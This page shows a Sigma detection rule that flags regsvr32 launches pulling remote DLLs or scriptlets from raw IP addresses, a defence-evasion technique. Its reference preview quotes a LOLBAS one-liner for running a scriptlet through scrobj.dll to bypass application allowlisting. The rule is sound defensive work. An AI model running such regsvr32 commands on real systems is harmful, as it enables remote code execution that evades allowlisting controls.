Potentially Suspicious Regsvr32 HTTP IP Pattern

calendar Apr 1, 2024 · attack.defense_evasion attack.t1218.010  ·
Share on: linkedin copy

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.

Sigma rule (View on GitHub)

 1title: Potentially Suspicious Regsvr32 HTTP IP Pattern
 2id: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8
 3status: test
 4description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
 5references:
 6    - https://twitter.com/mrd0x/status/1461041276514623491
 7    - https://twitter.com/tccontre18/status/1480950986650832903
 8    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
 9author: Florian Roth (Nextron Systems)
10date: 2022/01/11
11modified: 2023/05/24
12tags:
13    - attack.defense_evasion
14    - attack.t1218.010
15logsource:
16    category: process_creation
17    product: windows
18detection:
19    selection_img:
20        - Image|endswith: '\regsvr32.exe'
21        - OriginalFileName: 'REGSVR32.EXE'
22    selection_ip:
23        CommandLine|contains:
24            - ' /i:http://1'
25            - ' /i:http://2'
26            - ' /i:http://3'
27            - ' /i:http://4'
28            - ' /i:http://5'
29            - ' /i:http://6'
30            - ' /i:http://7'
31            - ' /i:http://8'
32            - ' /i:http://9'
33            - ' /i:https://1'
34            - ' /i:https://2'
35            - ' /i:https://3'
36            - ' /i:https://4'
37            - ' /i:https://5'
38            - ' /i:https://6'
39            - ' /i:https://7'
40            - ' /i:https://8'
41            - ' /i:https://9'
42            - ' -i:http://1'
43            - ' -i:http://2'
44            - ' -i:http://3'
45            - ' -i:http://4'
46            - ' -i:http://5'
47            - ' -i:http://6'
48            - ' -i:http://7'
49            - ' -i:http://8'
50            - ' -i:http://9'
51            - ' -i:https://1'
52            - ' -i:https://2'
53            - ' -i:https://3'
54            - ' -i:https://4'
55            - ' -i:https://5'
56            - ' -i:https://6'
57            - ' -i:https://7'
58            - ' -i:https://8'
59            - ' -i:https://9'
60    condition: all of selection_*
61falsepositives:
62    - FQDNs that start with a number such as "7-Zip"
63level: high

References

  • Something went wrong, but don’t fret — let’s give it another shot.


    Read More

  • Something went wrong, but don’t fret — let’s give it another shot.


    Read More

  • Regsvr32 | LOLBAS

    Execute the specified local .SCT script with scrobj.dll. regsvr32.exe /s /u /i:file.sct scrobj.dll Use caseExecute code from scriptlet, bypass Application whitelisting Privileges requiredUser Opera...


    Read More

Related rules

to-top